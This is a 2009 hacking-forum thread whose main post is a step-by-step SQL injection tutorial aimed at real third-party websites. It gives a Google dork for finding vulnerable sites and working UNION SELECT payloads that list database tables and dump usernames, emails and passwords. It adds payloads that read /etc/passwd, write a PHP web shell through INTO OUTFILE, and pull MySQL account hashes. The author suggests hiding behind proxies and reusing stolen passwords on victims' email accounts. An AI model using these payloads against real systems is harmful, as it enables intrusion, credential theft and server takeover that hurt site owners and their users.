|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
The Best SQL Injection Tutorial You'll Ever Find |
|
Posted: Sat May 09, 2009 10:41 pm |
|
|
tehhunter |
Valuable expert |
|
|
Joined: Nov 19, 2008 |
Posts: 261 |
|
|
|
|
|
|
|
I decided to write this because I am in exams right now, and frankly I'm going crazy studying. So this is my quick thirty-minute sideline to demonstrate how to properly find a website that's injectable, and then inject it.
DISCLAIMER: You are doing this on your own, I am not accountable! I recommend using a proxy or two always!
Currently this exploit works on roughly 443 different websites (or so Google tells me). Once you learn it, you can quite literally copy and paste the end and hack any one of them in a matter of seconds (I just did it, it was pretty fun).
STEP ONE: FINDING AN EXPLOITABLE WEBSITE
This step is easier said than done. Often times you'll find that you just can't find a website that is exploitable, and thus can't practice. Well then, Google is your friend. Now while I am not personally going to give you any exploitable webpages in this guide, suffice it to say you will definitely and very easily find them if you continue to read this.
Google allows the usage of search manipulators, a key one of which is 'inurl:'. This will only return websites with whatever follows that statement in the url. For example: Code: | If I do a search for:
inurl:.php
it will only show pages with .php in the url (usually at the end). |
Now we are going to use this to our advantage. See the following search query: Code: | inurl:php -inurl:asp -inurl:htm -inurl:html inurl:graphics_index.php inurl:cat= intitle:"Myspace Graphics" |
This is a query I have specifically constructed to only show websites that use a specific web site manager, one I know that has a commonly and easily exploitable hole. Go ahead, and try it now, I'll wait. By the way, while I'm waiting, I'll just inform you that this is a technique called 'Google dorking' and you can read much more of that elsewhere. Okay, now pick any one of the sites that show up. Got it? Good!
STEP TWO: FINDING AN EXPLOITABLE PARAMETER
The best and easiest way to find an exploitable parameter (which you will need for SQL Injection) is to simply throw a single quote ( ' ) in the parameters definition. So if you had.. Code: | http://www.mypage.com/mypage.php?cat=342 | ... you would simply change it to ... Code: | http://www.mypage.com/mypage.php?cat=342' |
Now if an error appears on the page, you are in luck, and the odds are greatly in your favor that this website is exploitable. The error should look a little something like
Code: | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '...<some code here>...'. |
Alright, now for the specific website that you are on right now, odds are that it does employ this specific website system (usually for hosting myspace templates or something like that). So lets mess around with this and append our own query. An important note, change whatever the parameter (in our case it will be the 'cat' parameter) you are exploiting's value to -1. Databases do not usually ever store negative entries, so to assure we do not receive any false positives, let us eliminate the possibility.
What we are going to be doing is piggy-backing on top of the query the webpage is using, something fully against the design intentions of whoever made it. The keyword we are going to be using is UNION. UNION essentially joins together two queries and merges their results. Since the first query (if you changed the parameter to -1) will return nothing, we are only going to see the results from our own query.
Also, one last thing for this, I removed every other parameter (because they are there to control how many results appear per page. We want all results to appear on one page, right? So graphics_index.php?pageNum_lays=0&cat=1&totalRows_lays=0 would be shortened to just graphics_index.php?cat=1 .
STEP THREE: EXPLOITING THE HOLE
Alright, so let's get on with hacking. You are now on the graphics_index.php page, and you are exploiting the 'cat' parameter. Now try the following:
Code: | graphics_index.php?cat=-1 UNION SELECT 1-- |
To let you understand this, you are joining together two queries. However, you'll notice you are getting an error, something like 'different number of columns' in the two queries. That is because to merge the results of the two queries, we must match the same number of columns. So we are going to sequentially increment the number of columns until we do not receive any more errors! (Also quick note: the -- at the end of the query is SQL's syntax for a comment, so anything after the -- will be ignored, helpful if the original query had annoying compromising code after it!)
Code: | graphics_index.php?cat=-1 UNION SELECT 1--
graphics_index.php?cat=-1 UNION SELECT 1,2--
graphics_index.php?cat=-1 UNION SELECT 1,2,3--
... | Continue adding in this fashion until you do not get an error about 'different number of columns'. Congrats! Odds are you received a page loading as normal, yes? You should probably (in this specific case) have ten columns total. If you didn't you might have done something wrong, so try this on a different site. Otherwise, scroll down the page and start to look for numbers, any numbers. See some? Or in our case, one? Right!
So we are going to be using that number (in every attempt I did, it was 3), or rather its position in the query we have created. Now we are at one of the two last stages.
If the server is using MySQL version 5.0.0 or greater, there will be a database called INFORMATION_SCHEMA that contains some very valuable information to us. So, lets try harnassing it! A quick note beforehand, the method concat() is an SQL function that allows us to join together relevant bits of information, and it will prove quite handy for us.
Code: | graphics_index.php?cat=-1 UNION SELECT 1,2,concat(TABLE_SCHEMA,char(58),TABLE_NAME),4,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES-- | This database, INFORMATION_SCHEMA, contains the basic layout of every database and table on the server that is visible to us. So as the page loads, you should see a fair amount of entries load on the page in the format of DATABASENAME:TABLENAME. We are looking for a users table because thats where the good information is. Find it? Good! It probably is called users (or if it isn't, then substitute the name you found in for 'users' in the rest of this tutorial).
Okay, so we have our targeted table, but now we need to know the layout of that specific table to inject it. Enter INFORMATION_SCHEMA.COLUMNS, which is much like the TABLES table, except it contains all the information on the columns. So now, we try the following query...
Code: | graphics_index.php?cat=-1 UNION SELECT 1,2,concat(table_schema,char(58),table_name,char(58),column_name),4,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.COLUMNS-- |
This should provide all the databases' column names in a format like DATABASENAME:TABLENAME:COLUMNNAME. So scroll down and find your users table among the results. Found it? We are going to be interested in the username field, the password field, and if you like (as I do), the email field. Often times, users will use the same passwords among many sites, so there's a decent chance this password will work for their email. So jot down the column names. In my case, the username field was 'uname', the password field was 'pass', and the email field was 'email'. So now we are nearing the end!
STEP FOUR: THE FINAL EXPLOIT
Here we are, at the end, one last query awaits you. I strongly suggest you guess on your own before just giving in and using the code that I give you below. Seriously! The best way to learn is on your own, and if you get it yourself, you will become immeasurably better than I could ever teach you.
Alright, if you didn't, that's fine too. Here we go. We are going to combine all the information we have gotten above into the final query:
Code: | graphics_index.php?cat=-1 UNION SELECT 1,2,concat(uname,char(58),email,char(58),pass),4,5,6,7,8,9,10 FROM users-- |
And there you have it, you have completed your first SQL injection. You should be provided with a list of users' information from that site in the format of USERNAME:EMAIL:PASSWORD.
I hope this proved helpful to some of you guys, I know that SQL injection was daunting for me at first, but it is really pretty easy once you get the hang of it (as I'm sure waraxe can attest). If you have any questions, just leave 'em, and I'll try to answer them as best I can.
STEP FIVE: TRY OTHER THINGS (OPTIONAL)
There are still a few tricks worth trying while you are learning SQL injection. Here are three of my favorites:
1) Replace the number you used above with load_file('/etc/passwd') or any other file you'd like to view. If you are lucky, and I would guess this works on about 1/4 sites. Protip: When you are initally scouting for errors, if you get an error that reveals a path (it would be in bold looking like "Error: /var/www/MaybeTheSiteName.com/html/index.php on line 63" or something), you can use that path inside of load_file() and thusly load pages' source from the website. Useful if you want to try to load any .htaccess or .htpasswd file on the site.
Example: Code: | graphics_index.php?cat=-1 UNION SELECT 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10--
OR if the server is actively blocking your quote marks (" or ') then you might be able to get around it using the SQL Char Encoder that you'll find a link to on the top left side of this page (under Tools). Try both the MySQL encodings. |
2) Use INTO OUTFILE to try to create a shell. If you were able to get the full path disclosure (like that from #1), then you may be able to write to the web directory, and if that is so, you could create a web-shell to execute your own commands on the server. For example: Code: | graphics_index.php?cat=-1 UNION SELECT 1,2,'<? system($_GET['cmd']); ?>',4,5,6,7,8,9,10 INTO OUTFILE '/var/www/MaybeTheSiteName.com/html/myshell.php'--
OR again, if the site is hassling you over usage of quotations (" or '), then you might be able to get away with either the hex encoder or char() encoder from Tools -> SQL Char Encoder on the top left of this page |
3) Try to access mysql.user. This database contains the usernames and passwords and access rights associated with the MySQL server on this server. If it is visible to you (as in it shows up during the stage of the hack earlier where you injected to view INFORMATION_SCHEMA.TABLES), you can view it, and thus exploit it and possibly gain a strong measure of control over the server.
Example: Code: | graphics_index.php?cat=-1 UNION SELECT 1,2,concat(Host,char(58),User,char(58),Password),4,5,6,7,8,9,10 FROM mysql.user-- |
If you find any results from this, I believe (though I might be mistaken) that the encryption is MySQL encryption which is essentially a double-hashing via Sha-1 (e.g. Sha1(Sha1('The Password')). Use this information to crack it, or just post it here!
I will be continuing to update this as I remember more stuff, but also please feel free to post here and I'll add any good bits of information (with the right credit). Thanks! |
|
Last edited by tehhunter on Sun May 10, 2009 6:50 pm; edited 2 times in total |
|
|
|
|
|
|
|
Posted: Sat May 09, 2009 11:11 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
Nice tuto, but i was expecting more when i saw: "The Best SQL Injection Tutorial You'll Ever Find" hehehe |
|
|
|
|
Posted: Sat May 09, 2009 11:19 pm |
|
|
tehhunter |
Valuable expert |
|
|
Joined: Nov 19, 2008 |
Posts: 261 |
|
|
|
|
|
|
|
delta wrote: | Nice tuto, but i was expecting more when i saw: "The Best SQL Injection Tutorial You'll Ever Find" hehehe | I could have gone into excruciating detail, but I figured that if you are on this site, you probably do know a thing or two already about injection. This was moreso an tutorial about being able to find websites and exploit them with a few common simple tricks. |
|
|
|
|
Posted: Sun May 10, 2009 11:38 am |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
You don't need a lot of details, even if i didn't know anything about sql injection I would understand this tuto... or i think so
Ah, and this dork don't have a lot of sites(20 +/-), but is good if ppl want to practice. |
|
|
|
|
Posted: Sun May 10, 2009 6:51 pm |
|
|
tehhunter |
Valuable expert |
|
|
Joined: Nov 19, 2008 |
Posts: 261 |
|
|
|
|
|
|
|
Yeah, I just updated to add a few additional things that are fun to know. I think this will be a work-in-progress thing as I remember more and more stuff. Read the bottom, by the way, because if anyone has any good tips to add, I'd be more than willing to add it with due credit. Thanks! |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|